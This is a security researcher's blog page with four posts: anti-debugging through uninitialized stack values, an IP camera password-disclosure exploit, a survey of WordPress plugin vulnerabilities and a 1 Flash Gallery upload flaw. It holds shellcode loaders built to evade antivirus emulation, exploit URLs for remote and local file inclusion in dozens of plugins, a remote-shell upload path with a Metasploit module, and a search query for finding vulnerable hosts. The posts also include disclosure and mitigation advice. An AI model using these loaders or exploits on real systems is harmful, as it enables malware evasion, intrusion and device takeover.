Spare Clock Cycles Hacking is freedom.

14Feb/1212

Stack Necromancy: Defeating Debuggers By Raising the Dead

This article presupposes a basic understanding of how function calls and stacks work. If you'd like to learn or need a refresher, Wikipedia is always a good place to start.

Introduction

Referencing uninitialized memory is a fairly common programming mistake that can cause a variety of seemingly bizarre behaviors in otherwise correct code. For the uninitiated,  take a look at CERT's secure coding guide for more info. Summarized, the core problem is that one might reuse memory that has already been touched by the application. Because that memory is not cleared automatically for performance reasons, it must be explicitly set to an expected value or one risks introducing unexpected behavior. Uninitialized memory references often go unnoticed, as the code will work just fine if the uninitialized memory doesn't contain an unfortunate value.

Interesting, but what does this have to do with detecting debuggers? Well, contrary to what many think, the value stored at a given uninitialized address can actually be quite predictable, especially when it comes to stack data. This is because the stack normally contains data that was used in previous function calls. If the same series of functions get called prior to a given function getting control, many of the values stored on the dead stack will be identical between runs. What this means is that if a debugger makes any changes whatsoever to a given process's dead stack space by making any extra function calls before our detection function gets run, an application should be able to detect differences between the normal state and the debugged state.

The Dead Live Again

Surely Windows wouldn't alter the stack when it's debugging a process...this could cause unanticipated behavior, especially when trying to debug uninitialized memory references! However, it appears that the Windows debugging API does just that. The following is a simplified version of the code I was writing when I first stumbled onto this issue:

#include <windows.h>
#include <stdio.h>
#include "tlhelp32.h"
void dbgchk(){
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE,0);
    //Comment out res=-1 for less magic
    DWORD res = -1;
    if(!hSnapshot)
        printf("Something bad happened");
    MODULEENTRY32 mod;
    if(!Module32First(hSnapshot,&mod)) {
        printf("Debugger detected!");
        return;
     }
     CloseHandle(hSnapshot);
     printf("Not a debugger!");
}
 
int main(){
    dbgchk();
    return 0;
}

Code and executable

When compiled using MinGW32 4.5.4 and run on Windows 7 32/64 bit, this code should correctly detect the presence of a debugger.

Let's look into what exactly is happening here. Upon first glance, it may not appear that anything is too overtly wrong (besides the uninitialized mod variable), and certainly nothing that seems like it should detect the presence of a debugger. One might be tempted to think that the API calls are trying to use some system functionality that behaves differently when debugged, a technique that is already often used in anti-reverse engineering. However, inspection in Olly reveals that this is not the case. Something more subtle is happening here.

Ollydbg in Mod32First call

As you can see, when we first enter the Module32First function, checks are performed on the mod variable, including one that checks the stack address 0x0022fc84 (which points to dwSize of the MODULEENTRY32 struct passed in) to see if it's greater than 0x243, the size of a MODULEENTRY32 structure. If this check fails, the function returns an error immediately. From the above stack state, this location is set to 0, and we know the check will fail. Because the check passes when we run it without a debugger, we can assume that there must be a different value stored at this address during normal operation. An appropriately placed printf reveals that there is a stack address, 0x0022fd60, in place of the 0 when run without the debugger, causing the function to proceed as normal.

I mentioned earlier that the state of the dead stack is dependent on the functions that have run previously. This helps to explain why the stack would be different when debugged vs not.  Most (all?) debuggers on Windows make extensive use of  the debugging API during their normal operation, given how easy it is to use and how much power it provides. The debugger can attach to a process in two ways: it can attach at process startup by passing the correct flags to CreateProcess, or it can call DebugActiveProcess to attach to one that is already running. When you open an executable directly in one of these debuggers, it will use the CreateProcess method, and wait for a CREATE_PROCESS_DEBUG_EVENT to occur. During this time, Windows calls all the necessary functions to instantiate the process, and this includes setting up the necessary debugging objects in the process space. Because of this, Windows behaves differently when loading a debugged process than when it's not, and this means (you guessed it!) different function calls, and different dead stack values.

Already, this looks like rather interesting anti-debugging technique. I haven't been able to find any previous description of this technique, but it's entirely possible my Google-fu is just weak. I refer to it as stack necromancy, given that it centers around the manipulation of previously dead stack values. Defeating it automatically seems to require foreknowledge of how exactly how the dead stack should look to an application, which is certainly a higher bar than, say, setting the IsDebugged flag in the PEB to 0. If one can align the stack properly to fail when making certain API calls while being debugged, but pass when not, one can easily create some rather cryptic checks for the presence of a debugger. Any API call that fails when certain values are passed to it could potentially be used to trigger the detection.

Improving Our Spells

Now that we know that we can detect the presence of a debugger, and it seems we can do so trivially inside any number of API calls: what next? A reverse engineer can just nop out the check once he finds where it is, and, although it's more subtle than many checks, a dedicated person would track it down. It would be nice if we could also make the entire operation of an executable dependent on the differences in the stack. There are two obvious ways to do this: use the previously shown tricks to cause a large number of necessary API calls to fail during debugging (for instance, by abusing LoadLibrary), or use values pulled off the stack to encrypt various necessary values. Thankfully for us, the dead stack is actually relatively stable, so we can do both of these. Both of these examples are still relatively easy to patch, but serve to show the kinds of things one might do.

Here's an example of some stack necromancy using the LoadLibrary API call, a rather straightforward function applications often call during normal execution that would cause the application to fail if the call failed:

#include <windows.h>
#include <stdio.h>
 
void dbgchk7(){
    char res[298];
    char lib[12] = "kernel32.dll";
    if(LoadLibrary(lib)){
        printf("Win 7: Not debugged!\n");
        return;
    }
    printf("Win 7: Debugged!\n");
}
 
void dbgchkxp(){
    char res[53];
    char lib[12] = "kernel32.dll";
    if(LoadLibrary(lib)){
        printf("XP: Not debugged!\n");
        return;
    }
    printf("XP: Debugged!\n");
}
 
BOOL chkxp(){
    UINT *ptr = (UINT *)((((UINT)&ptr) & 0x00FF0000)|0xfe0c);
    return ((*ptr)&0xff)==0x00;
}
 
int main(){
    //Detect OS first to avoid mangling dead stack
    if(chkxp())
        dbgchkxp();
    else
        dbgchk7();
    return 0;
}

Code and executable

Take a minute to look at the above code. Once again, nothing about the actual detection code seems like it should be able to tell whether an application is being debugged or not. This code sample does, in fact, exploit the same issue, but does it in a slightly different way.  Rather than making a length field fail a certain check, this code works by omitting the null terminator for the string containing the module to be loaded. This means the LoadLibrary call will fail or succeed depending on the character immediately following the lib array.  By placing the array in a position on the stack that will have a different value stored immediately after the string (null or otherwise), we can get the call to behave differently when being debugged.

To get this to work on both XP and Windows 7,  I had to do two main things: first, detect the OS without screwing up the stack, and second, push the lib array to an appropriate place by adding local variables to our chosen function. The OS detection is not strictly necessary in this case, but it made my life easier, as the first LoadLibrary call will significantly change the stack, making appropriate values more difficult to find, and finding a single offset that works on both is a bit frustrating. Normally, OS detection would be done through a Windows API call, but we again want to have as small of a footprint as possible to avoid messing up our stack.  Instead, we can do it with the same technique we're using to detect debugger presence, by simply grabbing a chosen value off of the stack and checking if it matches an expected value.

The offsets used here were rather arbitrarily chosen, largely by glancing over dumps of the stack state at the desired time while debugged vs not. I have yet to come up with a good way to automate that process, beyond a few stupid bits of code to print out portions of the uninitialized stack. I have found that places higher up (lower addresses) in the dead stack are more likely to be different, probably because they are largely left over from process setup and are less likely to have been overwritten by identical calls. However, the values lower in the dead stack seem to be more stable, so there's a tradeoff there. The nice thing about the approach is that there's no shortage of possible values to choose from; you're bound to find suitable values for what you want to do.

Here is an example of using stack necromancy to pull encryption values out of the stack graveyard, which causes the application to fail if it is being debugged:

#include <windows.h>
#include <stdio.h>
 
UCHAR msg[] = "\x06\x30\x2b\x2c\x29\x62\x2f\x2d\x30\x27\x62\x2d\x34\x23\x2e\x36\x2b\x2c\x27\x6c";
void print_results(UCHAR key){
    int i;
    for(i=0;i<20;i++)
       msg[i] = msg[i] ^ key;
    printf(msg);
    printf("\n\nWritten by supernothing, level 90 necromancer.\n");
 
}
 
void decodemessage(){
    //Get base address
    UINT *ptr = (UINT *)((((UINT)&ptr) & 0x00FF0000)|0xfe0c);
    if(((*ptr)&0xff)==0x00){
        //WinXP 32bit
        ptr = (UINT *)((((UINT)&ptr) & 0x00FF0000)|0xfdc8);
        print_results(((((*ptr)&0xff0000)>>16)^0x83));
    } else {
        //Win7 32 bit and 64 bit
        ptr = (UINT *)((((UINT)&ptr) & 0x00FF0000)|0xfdd0);
        print_results(((*ptr)&0xff)^0xb6);
    }
}
 
int main(){
    decodemessage();
    return 0;
}

Code and executable

While this is a somewhat simple example (I doubt a single byte XOR key is going to worry anyone), it serves to show that it is possible to resurrect dead stack values and use them as encryption keys. This code was tested on 32 bit Win XP and 32/64 bit Win 7 and will work correctly when run normally, but will fail miserably when run in a debugger. In this example, I simply find which system I'm running on and map the appropriate byte to the correct key via an XOR. This one uses the same hardcoded offset OS version check offset (0xfe0c) as our previous example for convenience. It then pulls the appropriate value from known stable addresses and uses it as a key. This same sort of code could easily be used to generate a much larger key and be used with a decent crypto algorithm.

This technique is not only useful when it comes to debuggers, however: it is arguably even more useful in defeating the dynamic code emulation used by antivirus applications to try and detect packed code. AV applications also make telltale changes to the stack space, which can allow an attacker to prevent their code from being dynamically unpacked in one of these environments. In a previous post, I talked about writing a simple crypter to bypass AV. In it, I used a timing attack to defeat emulation. We can see from these VirusTotal results that simply by using the same stack necromancy we used above, we can achieve similar results: without emulation defeat / with emulation defeat. The detection by CAT-QuickHeal is based on a generic unpacking signature which appears to center around large buffers being XORed, as it still throws a detection when the shellcode is non-functional.

Without defeat

#include <windows.h>
UCHAR sc[] = YOUR_SHELLCODE_HERE;
 
UCHAR key;
 
int main(){
    key = 0x42;
    int SC_LEN = 2477;
    int i;
    UCHAR* tmp = (unsigned char*)malloc(SC_LEN);
 
    for(i=0; i<SC_LEN; i++){
        tmp[i]=sc[i]^key;
    }
 
    ((void (*)())tmp)();
 
    return 0;
}

With defeat

#include <windows.h>
UCHAR sc[] = YOUR_SHELLCODE_HERE;
 
UCHAR key;
 
void getdecodeinfo(){
    //Get base address
    UINT ptr = (((unsigned int)&ptr)&0x00FF0000)+0xfb1c;
    if(((*(unsigned int*)ptr)&0xff)==0x24){
        //WinXP 32bit
        key = ((((*(unsigned int*)ptr)&0xff00)>>8)^0x4e);
    } else {
        //Win7 32 bit and 64 bit
        key = ((*(unsigned int*)ptr)&0xff)^0x4a;
    }
}
 
int main(){
    getdecodeinfo();
    int SC_LEN = 2477;
    int i;
    UCHAR* tmp = (unsigned char*)malloc(SC_LEN);
 
    for(i=0; i<SC_LEN; i++){
        tmp[i]=sc[i]^key;
    }
 
    ((void (*)())tmp)();
 
    return 0;
}

This particular class of defeats is extra nice however, as they can't be optimized out like many time-based ones, but are still quite generic and hard to detect with signatures. After all, many applications inadvertently reference uninitialized memory. Triggering on that alone could significantly increase false positives.

Machetes Are Your Friend

Bypassing the techniques I've presented here is by no means impossible, but they are an obstacle to reverse engineering. Because of the generality of the technique, and the large number of ways to use it, a "general" defeat would take some effort to develop. The best strategy I have come up with so far is creating the process in a suspended state without debugging it, dumping the stack state, re-running the application in a debugged state, and writing the expected dead stack into the process. Something along these lines *should* work, but I have not tested any of it.

Defeating single implementations, however, is definitely doable. The main challenge, as alluded to above, is finding where the detection happened. Malware is not going to be as kind to the reverse engineer as my examples are. A sample very well might detect the debugger during application startup, and then continue on its merry way until some point in the future. Because of how subtle the check can be, and how many different ways it could be used, it could be difficult to find the offending memory accesses. Carefully inspecting each function for accesses to uninitialized memory is probably too tedious / not feasible, so automation in the form of memory analysis tools is likely a must. There's a number of these tools for Windows, and most of them would probably work. Once the check is found, it can be patched like most other debug defeats. The exceptions are going to be examples that pull values from the stack rather than just checking them. These will require modifying the binary to print the value, and then running the code without a debugger.

The biggest concern for those performing stack necromancy is that Microsoft or an AV company will intentionally attempt to mangle the call sequence executed during application startup. This would be the obvious response in my mind to prevent malicious software from using it. If this happened, it would obviously render the application inoperative. For this reason, it may make sense to fail more gracefully here than with other techniques, falling back to an update mechanism of some kind to receive a fix.

As for defending against this technique in an AV's emulator, the only real way I can see is to perfectly simulate the runtime environment of the given process, down to the state of the empty stack. Unless you're doing that, these kinds of defeats should always work. However, I would love to see myself proved wrong.

Enough For Today

Sadly, that's about all I have on the wonderful world of dead stacks for this post. Due to the nature of the code that I've posted above, it obviously may not work on your particular system. I've been pretty thorough about testing it on various VMs and computers I have laying around, but that definitely doesn't preclude it breaking elsewhere. I've already identified a few things that can cause it to fail, namely certain intrusive AV techniques such as DLL injection, as well as differing OS versions. However, anything that affects the state of the stack prior to the application's main being reached could potentially disrupt it. If it's not working for you, feel free to let me know about it (preferably with suggestions as to why it fails and/or cleverly worded insults about my puny human brain).

Hopefully, I have been able to demonstrate some of the very interesting things that can be done by resurrecting dead stack values and using them to do one's bidding. There are doubtless many more ways that people could improve upon the techniques I have discussed here, and I look forward to hearing about them. Happy hacking.

Filed under: RE, Technology 12 Comments
23Jan/123

Exploiting an IP Camera Control Protocol: Redux

Last May, I wrote about a remote password disclosure vulnerability I found in a proprietary protocol used to control ~150 different low-end IP cameras. The exploit I wrote was tested on the Rosewill RXS-3211, a rebranded version of the Edimax IC3005.  The vulnerability remained unpatched in the RXS-3211 until July of last year, when a supposed fix was provided . Unfortunately, I've been busy working on other projects, so I just recently got around to testing it. Spoiler: the results weren't good. The following post documents how easy it is to still exploit this particular vulnerability, alternative ways to exploit the protocol, and how to create your own firmware images to run whatever you want on devices that you now control.

The Patch Is 0.1% Effective

After flashing the latest firmware image to one of my cameras and installing the new management application, I did exactly what I did the first time: fired up Wireshark again and looked through the traffic. It was clear from the dumps that they were at least obfuscating the traffic now, but the sad fact remained that when I entered my password into the client application, no traffic was sent to the server before I was granted access. Clearly,  authentication in the protocol is still occurring client-side. Not good.

With that knowledge, I thought it'd be fun to first explore what all one can do without even having the admin password. Thankfully, this was much easier than would be expected, given my fateful acquisition of Edimax's implementation of the protocol. While working on creating custom firmware images, I downloaded a number of GPL source packages released by Edimax. In the IC3010 package, I realized that Edimax had included more source code than normal, including one folder labeled "enet_EDIMAX". After a quick look, I realized I now had the source to the protocol I had been reversing. Win.

Rather than describing what one can do while unauthenticated, it would probably be faster to describe what one *can't* do. Reboots, factory resets, reading any and all device settings, performing WLAN surveys, toggling LEDs...it is even possible to perform remote, unauthenticated firmware flashing on some models.  Basically the only thing that isn't possible to do is grabbing remote frames from the camera. You can read through the code for yourself here:  enet_agentd.h enet_agentd.c . After some quick Python scripting, I confirmed that all of the supported functions on the RXS-3211 were still vulnerable to exploitation, even if the admin password was no longer in cleartext. If anyone reading has one of the cameras that supports wireless or firmware flashing (IC-1000, maybe others), I'd love to see if the other enet functionality works.

Obviously, the patch wasn't very effective. However, for the sake of curiosity and thoroughness, I wanted to see if it was still possible to recover the admin password. To do so meant figuring out how the traffic was being encoded. and if it could be defeated . The header format I described in my previous post was still intact, but the body was obviously scrambled somehow. While this could have required a serious reverse engineering effort, it turned out to be fairly simple.

In such situations, there's only a few options: encryption, compression, or both. After changing the password on the device  a few times and observing how the traffic changed, it became obvious that either very weak encryption was being used or the data was compressed, as there was an easily discernible pattern between the input text and the output. Comparing the passwords "1111111111" and "1234567890", it became clear that compression was the winner: the length of packets with the former password were a few bytes shorter than the latter. Compression algorithms often work by shrinking 'runs' of data in some way, and hence, will compress the same character in succession much more efficiently than different ones. To find out which algorithm, I then went back and ran strings on the management executable, which gave me my answer: zlib compression. Yes...their solution to remote password disclosure was to compress the password before sending it. Brilliant. After this, all it took was a single line of Python to make things work perfectly again: zlib.decompress(data[12:-4],-15).

To demonstrate these vulnerabilities, I threw together a simple Python script: enet_pwn.py. With this, an attacker can disclose the admin password and others stored on all devices using the enet protocol (including the "patched" RXS-3211),  grab many of the common settings shared between devices, and perform reboots and factory resets on the cameras. Obligatory disclaimer: I am not responsible for any illegal use of this tool.

Going Further

For all the vulnerabilities I've pointed out in their software, I still really like the Edimax cameras for their low cost and high "hackability". Creating firmware images for the devices can allow you do some cool things other cameras can't, and for ~30 dollars for the low end ones, it's a pretty good deal. In fact, the first time I bought one, I had actually considered turning it into a poor man's pentesting drop box (which it does quite well). However, because of how easy it is to create firmware images for the cameras, attackers can also install anything they like once getting the admin password. This could allow them to gain further unauthorized access to a network.

While creating custom firmware for these cameras is a little more complicated than simply using the firmware mod kit, it isn't by much. I've created a few basic scripts that handle everything, which basically just automate the process described here. All someone needs to do is use the extract_edimax.sh script to extract the image, modify the root filesystem to their liking, and then recompile with the build_edimax.sh script. Edimax provides a toolchain for compiling your own applications, which can also be found in my repository in the tools directory. For me, getting netcat on there was enough for everything I wanted. I should note though that any flashing you do could damage your device, so be careful. It is usually possible to recover through a serial terminal on the device, but it's usually best to avoid that annoyance.

Mitigation

For end users, the easiest thing to do is simply to block incoming UDP packets on port 13364. It's possible to make your own firmware image that isn't vulnerable, but this is left as an exercise for the reader (or possibly a later post).

For the developers, here is, once again, some possible pseudocode for the server:

if discovery request:
    allow
else if any other valid request encrypted with admin password hash:
    allow
else:
    deny deny deny

Never send cleartext passwords. Don't even send hashes unless you have to. And definitely don't send them to clients. It's not that complicated. If you can't do that much, you shouldn't be rolling your own protocols.

18Sep/1112

Explo(it|r)ing the WordPress Extension Repos

Today's post is kind of long, so I thought I should warn you in advance by adding an additional paragraph for you to read. I also wanted to provide download links for those who'd rather just read the code. It isn't the cleanest code in the world, so I apologize in advance. I discuss what all of these are for and how they work later on in the post, so if you're confused and/or curious, read on. Downloads:

  • Copies of the WordPress theme and plugin repositories can be grabbed via torrent (Please note that the plugin repo has a few directories incomplete/missing; this can be fixed by running my checkout code)
  • A new WordPress plugin fingerprinting tool, wpfinger (download). This tool can infer detailed version information on just about every plugin in the WordPress repository. This package also contains some useful libraries for checking out the repositories and scraping plugin rankings, as this is used in the fingerprinting tool.

Intro

After finding an arbitrary file upload vulnerability in 1 Flash Gallery, I became curious as to how many other WordPress plugins made basic security mistakes. The 1 Flash Gallery plugin issue, it seems, is that they CTRL-C-V'd code from a project called Uploadify, which has been known to be vulnerable for quite awhile.

After realizing this, I became curious as to how many plugins make easy-to-spot security mistakes, such as reusing vulnerable libraries or doing such things as include($_REQUEST['lulz']). However, my curiosity was initially somewhat hampered by the fact that downloading and auditing every WordPress plugin one at a time is not only a mind numbing task, but a herculean one as well. And, well, I'm incredibly lazy.

Getting the Repos

So what to do? Well, it turns out that WordPress is nice enough to have public repositories (http://plugins.svn.wordpress.org and http://themes.svn.wordpress.org) containing all plugins that have ever been submitted, as well as every theme.  This, of course, was exciting: I could just check this out, whip out some grep-fu, and have my answers.

Alright, so maybe it isn't as simple as that. First, the plugin repo is huge: as is, it's taking up a good 80GB on one of my disks and contains approximately 12,000,000 files, thanks in no small part to subversion's insistence on creating ridiculous numbers of internal files. This isn't all that suprising, however, given that the repo contains ~23,000 plugins.

As I found out in my initial failed attempts to grab the code, checking this out all at once with subversion is, as far as I can tell, impossible. After about 15-20 minutes of downloading, the checkout would error out, and I'd have to wait for SVN to reverify everything it had already gotten. This got old quickly, so I came up with a hacked workaround: I wrote a quick script that simply checked out the individual repositories for every plugin and theme. Not very clean, but for my purposes, effective. A little over a day later, I had all the themes and plugins, and it was time for some fun.

A side note: for those of you who would like to play with either of these, I'd recommend grabbing the torrent, extracting it, and then running my checkout script in wpfinger in the directory above them. This will still get you the latest versions of all the plugins, but should take significantly less time and put less strain on everyone's servers.

Attack

Anyway, on to the vulnerabilities. During my scans I found remote unauthenticated code execution vulnerabilities in 36 plugins, varying in popularity from ~250 downloads to ~60,000. Finding them took essentially no effort or skill on my part, just patience.

The following eleven plugins were found entirely with grep and a little bit of manual inspection. Instead of running over every PHP file in the repo, I sped things up by only running over code in the trunk directories. This was under the assumption that that should be the latest code. Pretty much all of these were found analyzing results from the same grep:

Grep used: egrep -i '(include|require)(_once)?(\(|\s+)[^[;)]*\$_(REQUEST|GET|POST|COOKIE)'

Base is http://host/wp-content/plugins/PLUGIN_NAME/ unless explicitly stated.

Remote File Include - unauthenticated
----------------------------------------------------------

  • zingiri-web-shop = /fws/ajax/init.inc.php?wpabspath=RFI OR /fwkfor/ajax/init.inc.php?wpabspath=RFI
  • mini-mail-dashboard-widget = wp-mini-mail.php?abspath=RFI (requires POSTing a file with ID wpmm-upload for this to work)
  • mailz = /lists/config/config.php?wpabspath=RFI
  • relocate-upload = relocate-upload.php?ru_folder=asdf&abspath=RFI
  • disclosure-policy-plugin = /functions/action.php?delete=asdf&blogUrl=asdf&abspath=RFI
  • wordpress-console = /common.php POST="root=RFI"
  • livesig = /livesig-ajax-backend.php POST="wp-root=RFI"
  • annonces = /includes/lib/photo/uploadPhoto.php?abspath=RFI
  • theme-tuner = /ajax/savetag.php POST="tt-abspath=RFI"
  • evarisk = /include/lib/actionsCorrectives/activite/uploadPhotoApres.php?abspath=RFI
  • light-post = /wp-light-post.php?abspath=RFI

Local File Include - unauthenticated
----------------------------------------------------------

  • news-and-events = http://host/wordpress/?ktf=ne_LFIPATH%00

As an experiment, I also modified a nice static source analyzer called RIPS to take command line arguments (grab here, if interested) and print out some basic information on probable vulnerabilities, and then ran it over the plugin repo. Unfortunately, the noise was still pretty high (partly due to its lack of OO support), so I didn't find all too much beyond the greps. However, it did turn up a few RFIs:

  • thecartpress = /checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=RFI
  • allwebmenus-wordpress-menu-plugin = actions.php POST="abspath=RFI"
  • wpeasystats = export.php?homep=RFI

Finally, I searched for Uploadify usage and outdated timthumb.php libraries. This turned up another 24 vulnerable plugins:

  • user-avatar - /user-avatar-pic.php -> Only vulnerable if register_globals is enabled
  • onswipe - /framework/thumb/thumb.php
  • islidex - /js/timthumb.php
  • seo-image-galleries - /timthumb.php
  • verve-meta-boxes - /tools/timthumb.php
  • dd-simple-photo-gallery - /include/resize.php
  • wp-marketplace - /libs/timthumb.php
  • a-gallery - /timthumb.php
  • auto-attachments - /thumb.php
  • cac-featured-content - /timthumb.php
  • category-grid-view-gallery - /includes/timthumb.php
  • category-list-portfolio-page - /scripts/timthumb.php
  • cms-pack - /timthumb.php
  • dp-thumbnail - /timthumb/timthumb.php
  • extend-wordpress - /helpers/timthumb/image.php
  • kino-gallery - /timthumb.php
  • lisl-last-image-slider - /timthumb.php
  • mediarss-external-gallery - /timthumb.php
  • really-easy-slider - /inc/thumb.php
  • rekt-slideshow - /picsize.php
  • rent-a-car - /libs/timthumb.php
  • vk-gallery - /lib/timthumb.php
  • gpress = /gpress-admin/fieldtypes/styles_editor/scripts/uploadify.php?fileext=php - exact same as 1 Flash Plugin vuln

Obviously, it's not very hard to find a decent number of 0days just by grepping around, which is mildly disconcerting. Honestly, I had so many hits for these searches that I probably missed a good deal of them. But what else, besides vulnerability discovery, can we do with all this data?

Fingerprint

As an attacker, it's always nice to be able to figure out exactly what code is running on a given server. Of course, this isn't usually possible, as it requires a large body of information that just isn't there. However, it becomes much, much easier when you have access to the wealth of information contained in an SVN repo.

I feel that I should mention that ethicalhack3r's awesome tool WPScan does some of this, but last I checked will only detect if the top 2000 plugins are installed, and, as far as I know, won't give you a version. This is not to fault his work, though, at all; as I said, doing fine grained fingerprinting on every plugin would normally be difficult to impossible in most circumstances, and his tool does a ton of stuff that wpfinger doesn't.

So what does the repo give us that we were missing before? Well, we of course have a list of all the plugins, and it is then trivial to grab all of their download stats from wordpress.org to sort them in order of popularity. In addition, we have not only the current version of the plugin in the trunks, but we also (if SVN is being used properly) have tags for each of the major version changes. Simply by comparing these and finding changed files that we can check for remotely (added/removed/modified content files or added/removed php scripts), we can build a very effective fingerprint for each version of the plugin. Then, all we have to do is run a small number of checks once we find that a plugin is installed to obtain, at the very least, the major version of the plugin.

My current implementation is not pretty, but it seems to work quite well on the servers I tested with. My signatures are simply binary search trees encoded using Python tuples (don't judge me, it was quick to do it that way), which I regenerate whenever I update the SVN.  The initial fingerprinting takes quite awhile, as it stupidly MD5s all of the relevant files in the repos. This was before I knew that filecmp/dircmp existed, so that's probably going to be rewritten soon enough.

Once the signatures are created, the scans are quite fast, and very effective. It normally only takes one to two requests to detect plugin presence, and only takes two or three more in most cases to detect the version. It also tries to deal with things like error pages that return 200 by using difflib to compare the error page to the returned page, although there's probably still some issues with that.

As I mentioned earlier, you can check the latest versions over on Google Code from now on. Here's a screenshot of a scan against one of my test servers:

wpfinger in action

Plugins + versions

Now that I've outlined more than enough ways to aid exploitation, let's talk briefly about what can be done to help prevent some of these attacks.

Defend

For the WordPress developers, the best defense would probably be to scan any commits for known vulnerabilities, and either warn or (preferably) block the developers from adding exploitable code to the repository. This can be done quite easily using pre-commit hooks for SVN, which allow for custom verification of commits to a repository. I'm planning on releasing an example script when I get time that will detect commits introducing the vulnerabilities I scanned for, but the more interesting problem is how to gather a larger, better collection of signatures. I've got a couple vague ideas for how to go about doing this, but would love suggestions on the subject.

As for what site admins can do, it's pretty clear: don't install plugins or themes unless you *absolutely* need to or you are willing to and have the expertise to audit what you're installing. Just because you have the latest version does not necessarily make you safe, and if you forget to update, it's quite easy for an attacker to detect and exploit. In addition to limiting your number of installed plugins, it might be possible to parse the signatures I provide and use a WAF to return tainted results when those URLs are requested too closely together. Haven't personally done it, but I'm sure it wouldn't be too extraordinarily difficult.

Conclusion

The methods presented here are not unique to WordPress; I'm fairly confident in saying that it could easily be applied to any open source CMS. I largely chose WordPress because I was already working with it when I stumbled into this, and they had a really nice repository to pull from. Please feel free to try it out other places, and let me know how it goes.

P.S.: I'd like to thank duststorm for lending me a server to seed the repos with. Much appreciated.

6Sep/119

1 Flash Gallery: Arbitrary File Upload

This is a short post documenting the vulnerability I inadvertently found yesterday in the 1 Flash Gallery plugin, which has since been patched. This plugin has been downloaded an estimated 460,000 times, and as of yesterday was ranked by WordPress as the 17th most popular plugin (although I'm not entirely sure how this judgement is made). A patch has been released, so anyone who has this plugin installed should update immediately. I'll probably do a follow-up in the near future on WordPress plugins in general, but for now, just the facts.

Vulnerability

The 1 Flash Gallery WordPress plugin is vulnerable to an arbitrary file upload vulnerability. This vulnerability is present from version 1.30 until version 1.5.7.

It is possible to plant a remote shell and thereby execute arbitrary code on the remote host by simply submitting a PHP file via POST request to the following URI on a vulnerable installation:

/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify&fileext=php

This works because the upload.php script a.) performs no authentication checks, b.) trusts a user-supplied request variable to provide allowed filetypes, and c.) does not actually validate that the file is a well-formed image file. I have only tested the vulnerability on an installation that does not perform watermarking, the default setting; it may or may not work on installations that do otherwise.

I have created a proof-of-concept Metasploit module demonstrating the vulnerability, which interested persons can download here: http://spareclockcycles.org/downloads/code/fgallery_file_upload.rb

Hosts can be found with the following Google search: inurl:"wp-content/plugins/1-flash-gallery"

Disclosure

I reported the vulnerability to both WordPress and the plugin developers yesterday, Sep 5 2011. Both responded quickly to the issue, and took appropriate measures. WordPress temporarily took down the plugin until the patch was released, which the developers did later in the day. I 'd like to thank WordPress for their fast and professional response.

I am now releasing details of the vulnerability publicly to ensure that users are aware of the issue, and encourage them to update their plugins accordingly. The 1 Flash Gallery developers did not stress the severe implications of this vulnerability in their changelog (or mention that it was a security issue at all), so this post is partly to ensure that the implications are made clear. Personally, I would uninstall the plugin, given its history of serious security issues and the developers' lack of candor about those reported to them.

As always, any comments are welcome.